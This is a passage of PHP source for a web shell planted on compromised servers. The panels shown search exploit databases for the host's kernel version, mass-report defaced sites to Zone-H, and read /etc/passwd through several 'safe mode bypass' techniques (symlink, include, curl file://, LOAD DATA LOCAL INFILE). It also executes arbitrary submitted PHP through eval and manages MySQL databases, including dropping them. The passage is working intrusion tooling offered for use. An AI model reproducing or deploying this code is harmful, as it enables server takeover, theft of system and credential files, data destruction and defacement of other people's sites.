  1965. $hardstyle = explode("/", $file);
  1966.  
  1967. for($a=0;$a<count($hardstyle);$a++){
  1968. if(!empty($hardstyle[$a])){
  1969. if(!file_exists($hardstyle[$a]))
  1970. mkdir($hardstyle[$a]);
  1971. chdir($hardstyle[$a]);
  1972. $as++;
  1973. }
  1974. }
  1975. $as++;
  1976. while($as--)
  1977. chdir("..");
  1978.  
  1979. @rmdir("fakesymlink");
  1980. @unlink("fakesymlink");
  1981.  
  1982. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  1983.  
  1984. // this loop will skip allready created symlinks.
  1985. while(1)
  1986. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  1987. else $num++;
  1988.  
  1989. @unlink("fakesymlink");
  1990. mkdir("fakesymlink");
  1991.  
  1992. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  1993.  
  1994. }
  1995. }
  1996. }
  1997.  
  1998. // Exploit Search
  1999. else if(isset($_GET["exploit"]))
  2000. {
  2001. if(!isset($_GET["rootexploit"]))
  2002. {
  2003. ?>
  2004. <center>
  2005. <form action="<?php echo $self; ?>" method="get" target="_blank">
  2006. <input type="hidden" name="exploit">
  2007. <table border="1" cellpadding="5" cellspacing="4" style="width:50%;">
  2008. <tr>
  2009. <td style="height:60px;">
  2010. <font size="4" color="lime">Select Website</font></td><td>
  2011. <p><select id="rootexploit" name="rootexploit" class="box">
  2012. <option value="exploit-db">Exploit-db</option>
  2013. <option value="packetstormsecurity">Packetstormsecurity</option>
  2014. <option value="exploitsearch">Exploitsearch</option>
  2015. <option value="shodanhq">Shodanhq</option>
  2016. </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
  2017. <input type="submit" value="Search" class="but"></td></tr></table>
  2018. </form></center><br>
  2019.  
  2020. <?php
  2021. }
  2022. else
  2023. {
  2024. //exploit search
  2025. $Lversion = php_uname(r);
  2026. $OSV = php_uname(s);
  2027. if(eregi('Linux',$OSV))
  2028. {
  2029. $Lversion=substr($Lversion,0,6);
  2030. if($_GET['rootexploit'] == "exploit-db")
  2031. {
  2032. header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
  2033. }
  2034. else if($_GET['rootexploit'] == "packetstormsecurity")
  2035. {
  2036. header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
  2037. }
  2038. else if($_GET['rootexploit'] == "exploitsearch")
  2039. {
  2040. header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
  2041. }
  2042. else if($_GET['rootexploit'] == "shodanhq")
  2043. {
  2044. header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
  2045. }
  2046. }
  2047. else
  2048. {
  2049. $Lversion=substr($Lversion,0,3);
  2050. if($_GET['rootexploit'] == "exploit-db")
  2051. {
  2052. header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
  2053. }
  2054. else if($_GET['rootexploit'] == "packetstormsecurity")
  2055. {
  2056. header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
  2057. }
  2058. else if($_GET['rootexploit'] == "exploitsearch")
  2059. {
  2060. header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
  2061. }
  2062. else if($_GET['rootexploit'] == "shodanhq")
  2063. {
  2064. header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
  2065. }
  2066. }
  2067. //End of Exploit search
  2068. }
  2069.  
  2070. }
  2071.  
  2072. else if(isset($_POST["SendNowToZoneH"]))
  2073. {
  2074. $hacker = $_POST['defacer'];
  2075. $method = $_POST['hackmode'];
  2076. $neden = $_POST['reason'];
  2077. $site = $_POST['domain'];
  2078.  
  2079. if (empty($hacker))
  2080. {
  2081. die("<center><font color=red size=3>[-] You Must Fill the Attacker name !</font></center>");
  2082. }
  2083. elseif($method == "--------SELECT--------")
  2084. {
  2085. die("<center><font color=red size=3>[-] You Must Select The Method !</center>");
  2086. }
  2087. elseif($neden == "--------SELECT--------")
  2088. {
  2089. die("<center><font color=red size=3>[-] You Must Select The Reason</center>");
  2090. }
  2091. elseif(empty($site))
  2092. {
  2093. die("<center><font color=red size=3>[-] You Must Inter the Sites List !</center>");
  2094. }
  2095.  
  2096. $i = 0;
  2097. $sites = explode("\n", $site);
  2098. echo "<pre class=ml1 style='margin-top:5px'>";
  2099. while($i < count($sites))
  2100. {
  2101. if(substr($sites[$i], 0, 4) != "http")
  2102. {
  2103. $sites[$i] = "http://".$sites[$i];
  2104. }
  2105. ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  2106. echo "<font color=lime size=3>Site : ".$sites[$i]." Posted !</font><br>";
  2107. ++$i;
  2108. }
  2109.  
  2110. echo "<font color=lime size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
  2111. }
  2112.  
  2113. // Spread Shell
  2114. else if (isset($_GET["bypass"]))
  2115. {
  2116. if(isset($_GET['copy']))
  2117. {
  2118. if(@copy($_GET['copy'],"test1.php"))
  2119. {
  2120. $fh=fopen("test1.php",'r');
  2121. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
  2122. @fclose($fh);
  2123. unlink("test1.php");
  2124. }
  2125. }
  2126. else if(isset($_GET['imap']))
  2127. {
  2128. $string = $_GET['imap'];
  2129. echo "<textarea cols=120 rows=20 class=box readonly>";
  2130. $stream = imap_open($string, "", "");
  2131. $str = imap_body($stream, 1);
  2132. echo "</textarea>";
  2133. }
  2134. else if(isset($_GET['sql']))
  2135. {
  2136. echo "<textarea cols=120 rows=20 class=box readonly>";
  2137. $file=$_GET['ssql'];
  2138.  
  2139.  
  2140. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  2141. $mysql_files = explode(':', $mysql_files_str);
  2142.  
  2143. $sql = array (
  2144. "USE $mdb",
  2145. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  2146. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  2147. . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
  2148. . "ESCAPED BY '' "
  2149. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  2150.  
  2151. "SELECT a FROM $tbl LIMIT 1"
  2152. );
  2153. mysql_connect ($mhost, $muser, $mpass);
  2154.  
  2155. foreach ($sql as $statement) {
  2156. $q = mysql_query ($statement);
  2157.  
  2158. if ($q == false) die (
  2159. "FAILED: " . $statement . "\n" .
  2160. "REASON: " . mysql_error () . "\n"
  2161. );
  2162.  
  2163. if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  2164.  
  2165. echo htmlspecialchars($r[0]);
  2166. mysql_free_result ($q);
  2167. }
  2168. echo "</textarea>";
  2169. }
  2170. else if(isset($_GET['curl']))
  2171. {
  2172. $ch=curl_init("file://" . $_GET[curl]);
  2173. curl_setopt($ch,CURLOPT_HEADERS,0);
  2174. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2175. $file_out=curl_exec($ch);
  2176. curl_close($ch);
  2177. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
  2178. }
  2179. else if(isset($_GET['include']))
  2180. {
  2181. if(file_exists($_GET['include']))
  2182. {
  2183. echo "<textarea cols=120 rows=20 class=box readonly>";
  2184. @include($_GET['include']);
  2185. echo "</textarea>";
  2186. }
  2187. else
  2188. echo "<br><center><font color=red size=3>Can't Read" . $_GET['include'] . "</font></center>";
  2189. }
  2190. else if(isset($_GET['id']))
  2191. {
  2192. echo "<textarea cols=120 rows=20 class=box readonly>";
  2193. for($uid=0;$uid<60000;$uid++)
  2194. { //cat /etc/passwd
  2195. $ara = posix_getpwuid($uid);
  2196. if (!empty($ara))
  2197. {
  2198. while (list ($key, $val) = each($ara))
  2199. {
  2200. print "$val:";
  2201. }
  2202. print "\n";
  2203. }
  2204. }
  2205. echo "</textarea>";
  2206. break;
  2207. }
  2208. else if(isset($_GET['tempname']))
  2209. {
  2210. tempnam("/home/" . $_GET['tempname']);
  2211. }
  2212. else if(isset($_GET['sym']))
  2213. {
  2214. echo "<textarea cols=120 rows=20 class=box readonly>";
  2215. $fp = fopen("hack15.txt","w+");
  2216. fwrite($fp,"Php Hacker Was Here");
  2217. @unlink($flib);
  2218. $sym = "/home/" . $them . "/public_html/" . $k;
  2219. $link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
  2220. @symlink($sym, $link);
  2221. if ($k{0} == "/")
  2222. {
  2223. echo "<script> window.location = '" . $flib . "'</script>";
  2224. }
  2225. else
  2226. {
  2227. echo "<pre><xmp>";
  2228. echo readlink($flib) . "\n";
  2229. echo "Filesize: " . linkinfo($flib) . "B\n\n";
  2230. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
  2231. echo "</textarea>";
  2232. }
  2233. }
  2234. else
  2235. {
  2236. ?>
  2237.  
  2238. <table cellpadding="7" align="center" border="3" style="width:70%;">
  2239. <tr>
  2240. <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
  2241. </tr>
  2242. <tr>
  2243. <td align="center">
  2244. <p>Using copy() function</p>
  2245. <form action="<?php echo $self; ?>" method="get">
  2246. <input type="hidden" name="bypass">
  2247. <input type="text" name="copy" value="/etc/passwd" class="sbox"><input type="submit" value="bypass" class="but">
  2248. </form>
  2249. </td>
  2250. <td align="center">
  2251. <p>Using imap() function</p>
  2252. <form action="<?php echo $self; ?>" method="get">
  2253. <input type="hidden" name="bypass">
  2254. <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2255. </form>
  2256. </td>
  2257. </tr>
  2258.  
  2259. <tr>
  2260. <td align="center">
  2261. <p>Using sql() function</p>
  2262. <form action="<?php echo $self; ?>" method="get">
  2263. <input type="hidden" name="bypass">
  2264. <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2265. </form>
  2266. </td>
  2267. <td align="center">
  2268. <p>Using Curl() function</p>
  2269. <form action="<?php echo $self; ?>" method="get">
  2270. <input type="hidden" name="bypass">
  2271. <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2272. </form>
  2273. </td>
  2274. </tr>
  2275.  
  2276. <tr>
  2277. <td align="center">
  2278. <p>Bypass using include()</p>
  2279. <form action="<?php echo $self; ?>" method="get">
  2280. <input type="hidden" name="bypass">
  2281. <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2282. </form>
  2283. </td>
  2284. <td align="center">
  2285. <p>Using id() function</p>
  2286. <form action="<?php echo $self; ?>" method="get">
  2287. <input type="hidden" name="bypass">
  2288. <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2289. </form>
  2290. </td>
  2291. </tr>
  2292.  
  2293. <tr>
  2294. <td align="center">
  2295. <p>Using tempnam() function</p>
  2296. <form action="<?php echo $self; ?>" method="get">
  2297. <input type="hidden" name="bypass">
  2298. <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2299. </form>
  2300. </td>
  2301. <td align="center">
  2302. <p>Using symlink() function</p>
  2303. <form action="<?php echo $self; ?>" method="get">
  2304. <input type="hidden" name="bypass">
  2305. <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
  2306. </form>
  2307. </td>
  2308. </tr>
  2309. </table>
  2310. </form>
  2311. <?php
  2312. }
  2313. }
  2314. else if (isset($_GET["phpc"]))
  2315. {
  2316. // If the comand was sent
  2317. if(isset($_POST['code'])&& $_POST['code'] && isset($_POST['intext'])&& $_POST['intext'] == "disp")
  2318. {
  2319. // FIlter Some Chars we dont need
  2320. ?><br>
  2321. <textarea name="code" class="box" cols="120" rows="10"><?php
  2322. $code = str_replace("<?php","",$_POST['code']);
  2323. $code = str_replace("<?","",$code);
  2324. $code = str_replace("?>","",$code);
  2325.  
  2326. // Evaluate PHP CoDE!
  2327. htmlspecialchars(eval($code));
  2328. ?>
  2329. </textarea><?php
  2330. }
  2331. else if(isset($_POST['code'])&& $_POST['code'] && !isset($_POST['intext']))
  2332. {
  2333. $code = str_replace("<?php","",$_POST['code']);
  2334. $code = str_replace("<?","",$code);
  2335. $code = str_replace("?>","",$code);
  2336.  
  2337. // Evaluate PHP CoDE!
  2338. ?><br><font color="red" size="4">Result of execution this PHP-code :</font><br><font color="lime" size="3"><?php htmlspecialchars(eval($code)); ?></font><?php
  2339. }
  2340. ?>
  2341. <form method="POST">
  2342. <textarea name="code" class="box" cols="120" rows="10"><?php if(isset($_POST['code'])) { echo $_POST['code']; } else { ?>phpinfo();<?php } ?></textarea>
  2343. <br /><br />
  2344. <input name="submit" value="Execute This COde! " class="but" type="submit" />
  2345. <input type="checkbox" name="intext" value="disp"> <font color="lime" size="3">Display in Textarea</font>
  2346. </form>
  2347. <?php
  2348. }
  2349.  
  2350.  
  2351. else if(isset($_GET['database']))
  2352. { ?>
  2353. <form action=<?php echo $self; ?> method="POST">
  2354. <table style="width:90%;" cellpadding="4" align="center">
  2355. <tr>
  2356. <td colspan="2">Connect To Database</td>
  2357. </tr>
  2358. <tr>
  2359. <td>Server Address :</td>
  2360. <td><input type="text" class="box" name="server" value="localhost"></td>
  2361. <!--<td rowspan="4"><textarea name="query" cols="60" rows="7" class="box">SHOW DATABASE</textarea>-->
  2362. </tr>
  2363. <tr>
  2364. <td>Username :</td>
  2365. <td><input type="text" class="box" name="username" value="root"></td>
  2366. </tr>
  2367. <tr>
  2368. <td>Password:</td>
  2369. <td><input type="text" class="box" name="password" value=""></td>
  2370. </tr>
  2371.  
  2372. <tr>
  2373. <td></td>
  2374. <td><input type="submit" value=" Connect " name="executeit" class="but"></td>
  2375. </tr>
  2376. </table>
  2377. </form>
  2378. <?php
  2379. }
  2380. // Execute Query
  2381. else if(isset($_POST["executeit"]))
  2382. {
  2383. if(isset($_POST['username']) && isset($_POST['server']))
  2384. { ?>
  2385. <br>
  2386. <form>
  2387. <input type="hidden" name="action" value="createDB">
  2388. <table>
  2389. <tr>
  2390. <td><input type="text" class="box" name="dbname"></td><td><input type="submit" value=" Create Database " name="createmydb" class="but"></td>
  2391. </tr>
  2392. </table>
  2393. </form>
  2394. <br>
  2395. <?php
  2396. $dbserver = $_POST['server'];
  2397. $dbuser = $_POST['username'];
  2398. $dbpass = $_POST['password'];
  2399.  
  2400. setcookie("dbserver", $dbserver);
  2401. setcookie("dbuser", $dbuser);
  2402. setcookie("dbpass", $dbpass);
  2403. header("Location:$self?data");
  2404.  
  2405. }
  2406. }
  2407. else if(isset($_GET['data']))
  2408. {
  2409. listdatabase();
  2410. }
  2411. else if(isset($_GET['viewdb']))
  2412. {
  2413. listdatabase();
  2414. }
  2415.  
  2416. else if(isset($_GET['action']) && isset($_GET['dbname']))
  2417. {
  2418. if($_GET['action'] == "createDB")
  2419. {
  2420. $dbname = $_GET['dbname'];
  2421. $dbserver = $_COOKIE["dbserver"];
  2422. $dbuser = $_COOKIE["dbuser"];
  2423. $dbpass = $_COOKIE["dbpass"];
  2424. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  2425. mysql_query("create database $dbname",$mysqlHandle);
  2426. listdatabase();
  2427. }
  2428. if($_GET['action'] == 'dropDB')
  2429. {
  2430. $dbname = $_GET['dbname'];
  2431. $dbserver = $_COOKIE["dbserver"];
  2432. $dbuser = $_COOKIE["dbuser"];
  2433. $dbpass = $_COOKIE["dbpass"];
  2434. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  2435. mysql_query("drop database $dbname",$mysqlHandle);
  2436. mysql_close($mysqlHandle);
  2437. listdatabase();
  2438. }
  2439. if($_GET['action'] == 'listTables')
  2440. {
  2441. listtable();
  2442. }
  2443.  
  2444. // Create Tables
  2445. if($_GET['action'] == "createtable")
  2446. {
  2447. $dbserver = $_COOKIE["dbserver"];
  2448. $dbuser = $_COOKIE["dbuser"];
  2449. $dbpass = $_COOKIE["dbpass"];
  2450. $dbname = $_GET['dbname'];
  2451. $tablename = $_GET['tablename'];
  2452. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2453. mysql_select_db($dbname);
  2454. mysql_query("CREATE TABLE $tablename ( no INT )");
  2455. listtable();
  2456. }
  2457.  
  2458. // Drop Tables
  2459. if($_GET['action'] == "dropTable")
  2460. {
  2461. $dbserver = $_COOKIE["dbserver"];
  2462. $dbuser = $_COOKIE["dbuser"];
  2463. $dbpass = $_COOKIE["dbpass"];
  2464. $dbname = $_GET['dbname'];
  2465. $tablename = $_GET['tablename'];
  2466. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2467. mysql_select_db($dbname);
  2468. mysql_query("drop table $tablename");
  2469. listtable();
  2470. }
  2471.  
  2472. // Empty Tables
  2473. if($_GET['action'] == "empty")
  2474. {
  2475. $dbserver = $_COOKIE["dbserver"];
  2476. $dbuser = $_COOKIE["dbuser"];
  2477. $dbpass = $_COOKIE["dbpass"];
  2478. $dbname = $_GET['dbname'];
  2479. $tablename = $_GET['tablename'];
  2480. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2481. mysql_select_db($dbname);
  2482. mysql_query("delete from $tablename");
  2483. listtable();
  2484. }
  2485.  
  2486. // Empty Tables
  2487. if($_GET['action'] == "dropField")
  2488. {
  2489. $dbserver = $_COOKIE["dbserver"];
  2490. $dbuser = $_COOKIE["dbuser"];
  2491. $dbpass = $_COOKIE["dbpass"];
  2492. $dbname = $_GET['dbname'];
  2493. $tablename = $_GET['tablename'];
  2494. $fieldname = $_GET['fieldname'];
  2495. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2496. mysql_select_db($dbname);
  2497. $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
  2498. mysql_select_db( $dbname, $mysqlHandle );
  2499. mysql_query( $queryStr , $mysqlHandle );
  2500. listtable();
  2501. }
  2502.  
  2503. // View Table Schema
  2504. if($_GET['action'] == "viewSchema")
  2505. {
  2506. $dbserver = $_COOKIE["dbserver"];
  2507. $dbuser = $_COOKIE["dbuser"];
  2508. $dbpass = $_COOKIE["dbpass"];
  2509. $dbname = $_GET['dbname'];
  2510. $tablename = $_GET['tablename'];
  2511. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2512. mysql_select_db($dbname);
  2513. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  2514. $pResult = mysql_query( "SHOW fields FROM $tablename" );
  2515. $num = mysql_num_rows( $pResult );
  2516. echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
  2517. echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
  2518. for( $i = 0; $i < $num; $i++ )
  2519. {
  2520. $field = mysql_fetch_array( $pResult );
  2521. echo "<tr>\n";
  2522. echo "<td>".$field["Field"]."</td>\n";
  2523. echo "<td>".$field["Type"]."</td>\n";
  2524. echo "<td>".$field["Null"]."</td>\n";
  2525. echo "<td>".$field["Key"]."</td>\n";
  2526. echo "<td>".$field["Default"]."</td>\n";
  2527. echo "<td>".$field["Extra"]."</td>\n";
  2528. $fieldname = $field["Field"];
  2529. echo "<td><a href='$self?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
  2530. echo "</tr>\n";
  2531. }
  2532. echo "</table>";
  2533. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  2534. }
  2535.  
  2536. // Execute Query
  2537. if($_GET['action'] == "executequery")
  2538. {
  2539. $dbserver = $_COOKIE["dbserver"];
  2540. $dbuser = $_COOKIE["dbuser"];
  2541. $dbpass = $_COOKIE["dbpass"];
  2542. $dbname = $_GET['dbname'];
  2543. $tablename = $_GET['tablename'];
  2544. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2545. mysql_select_db($dbname);
  2546. $result = mysql_query($_GET['executemyquery']);
  2547.  
  2548. // results
  2549. echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
  2550.  
  2551. $count = 0;
  2552. while ($row = mysql_fetch_assoc($result))
  2553. {
  2554. echo "<tr>\r\n";
  2555.  
  2556. if ($count==0) // list column names
  2557. {
  2558. echo "<tr>\r\n";
  2559. while($key = key($row))
  2560. {
  2561. echo "<td><b>" . $key . "</b></td>\r\n";
  2562. next($row);
  2563. }
  2564. echo "</tr>\r\n";
  2565. }
  2566.  
  2567. foreach($row as $r) // list content of column names
  2568. {
  2569. if ($r=='') $r = '<font color=red>NULL</font>';
  2570. echo "<td><font color=lime>" . $r . "</font></td>\r\n";
  2571. }
  2572. echo "</tr>\r\n";
  2573. $count++;
  2574. }
  2575. echo "</table>\n\r<font color=lime size=3>" . $count . " rows returned.</font>\r\n</html>";
  2576. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  2577. }
  2578.  
  2579. // View Table Data
  2580. if($_GET['action'] == "viewdata")
  2581. {
  2582. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
  2583. $dbserver = $_COOKIE["dbserver"];
  2584. $dbuser = $_COOKIE["dbuser"];
  2585. $dbpass = $_COOKIE["dbpass"];
  2586. $dbname = $_GET['dbname'];
  2587. $tablename = $_GET['tablename'];
  2588. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  2589. ?>
  2590. <br><br>
  2591. <form>
  2592. <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
  2593. <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
  2594. <input type="hidden" value="executequery" name="action">
  2595. <table>
  2596. <tr>
  2597. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
  2598. </tr>
  2599. <tr>
  2600. <td><input type="submit" value="Execute" class="but"></td>
  2601. </tr>
  2602. </table>
  2603. </form>
  2604. <?php
  2605. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2606. mysql_select_db($dbname);
  2607.  
  2608. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  2609. $row = mysql_fetch_array($sql);
  2610. $rowid = $row['COLUMN_NAME'];
  2611.  
  2612. echo "<br><font size=4 color =lime>Data in Table</font><br>";
  2613. if( $tablename != "" )
  2614. echo "<font size=3 color=lime>$dbname &gt; $tablename</font><br>";
  2615. else
  2616. echo "<font size=3 color=lime>$dbname</font><br>";
  2617.  
  2618. $queryStr = "";
  2619. $pag = 0;
  2620. $queryStr = stripslashes( $queryStr );
  2621. if( $queryStr == "" )
  2622. {
  2623. if(isset($_REQUEST['page']))
  2624. {
  2625. $res = mysql_query("select * from $tablename");
  2626. $getres = mysql_num_rows($res);
  2627. $coun = ceil($getres/30);
  2628. if($_REQUEST['page'] != 1)
  2629. $pag = $_REQUEST['page'] * 30;
  2630. else
  2631. $pag = $_REQUEST['page'] * 30;
  2632.  
  2633. $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
  2634. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
  2635. $arrcount = 1;
  2636. $arrdata[$arrcount] = 0;
  2637. while($row = mysql_fetch_array($sql))
  2638. {
  2639. $arrdata[$arrcount] = $row[$rowid];
  2640. $arrcount++;
  2641. }
  2642. }
  2643. else
  2644. {
  2645. $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
  2646. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
  2647. $arrcount = 1;
  2648. $arrdata[$arrcount] = 0;
  2649. while($row = mysql_fetch_array($sql))
  2650. {
  2651. $arrdata[$arrcount] = $row[$rowid];
  2652. $arrcount++;
  2653. }
  2654. }
  2655. if( $orderby != "" )
  2656. $queryStr .= " ORDER BY $orderby";
  2657. echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'><font size=3>Schema</font></a>\n";
  2658. }
  2659.  
  2660. $pResult = mysql_query($queryStr );
  2661. $fieldt = mysql_fetch_field($pResult);
  2662. $tablename = $fieldt->table;
  2663. $errMsg = mysql_error();
  2664.  
  2665. $GLOBALS[queryStr] = $queryStr;
  2666.  
  2667. if( $pResult == false )
  2668. {
  2669. echoQueryResult();
  2670. return;
  2671. }
  2672. if( $pResult == 1 )
  2673. {
  2674. $errMsg = "Success";
  2675. echoQueryResult();
  2676. return;
  2677. }
  2678.  
  2679. echo "<hr>\n";
  2680.  
  2681. $row = mysql_num_rows( $pResult );
  2682. $col = mysql_num_fields( $pResult );
  2683.  
  2684. if( $row == 0 )
  2685. {
  2686. echo "<font color=red size=3>No Data Exist!</font>";
  2687. return;
  2688. }
  2689.  
  2690. if( $rowperpage == "" ) $rowperpage = 30;
  2691. if( $page == "" ) $page = 0;
  2692. else $page--;
  2693. mysql_data_seek( $pResult, $page * $rowperpage );
  2694.  
  2695. echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
  2696. echo "<tr>\n";
  2697. for( $i = 0; $i < $col; $i++ )
  2698. {
  2699. $field = mysql_fetch_field( $pResult, $i );
  2700. echo "<th>";
  2701. if($action == "viewdata")
  2702. echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
  2703. else
  2704. echo $field->name."\n";
  2705. echo "</th>\n";
  2706. }
  2707. echo "<th colspan=2>Action</th>\n";
  2708. echo "</tr>\n";
  2709. $num=1;
  2710.  
  2711.  
  2712. $acount = 1;
  2713.  
  2714. for( $i = 0; $i < $rowperpage; $i++ )
  2715. {
  2716. $rowArray = mysql_fetch_row( $pResult );
  2717. if( $rowArray == false ) break;
  2718. echo "<tr>\n";
  2719. $key = "";
  2720. for( $j = 0; $j < $col; $j++ )
  2721. {
  2722. $data = $rowArray[$j];
  2723.  
  2724. $field = mysql_fetch_field( $pResult, $j );
  2725. if( $field->primary_key == 1 )
  2726. $key .= "&" . $field->name . "=" . $data;
  2727.  
  2728. if( strlen( $data ) > 30 )
  2729. $data = substr( $data, 0, 30 ) . "...";
  2730. $data = htmlspecialchars( $data );
  2731. echo "<td>\n";
  2732. echo "<font color=lime>$data</font>\n";
  2733. echo "</td>\n";
  2734. }
  2735.  
  2736. if(!is_numeric($arrdata[$acount]))
  2737. echo "<td colspan=2>No Key</td>\n";
  2738. else
  2739. {
  2740. echo "<td><a href='$PHP_SELF?action=editData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
  2741. echo "<td><a href='$PHP_SELF?action=deleteData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
  2742. $acount++;
  2743. }
  2744. }
  2745. echo "</tr>\n";
  2746.  
  2747.  
  2748. echo "</table>";
  2749. if($arrcount > 30)
  2750. {
  2751. $res = mysql_query("select * from $tablename");
  2752. $getres = mysql_num_rows($res);
  2753. $coun = ceil($getres/30);
  2754. echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
  2755. for($i=0;$i<$coun;$i++)
  2756. echo "<option value=$i>$i</option>";
  2757.  
  2758. echo "</select> <input type=submit value=Go class=but></form>";
  2759. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
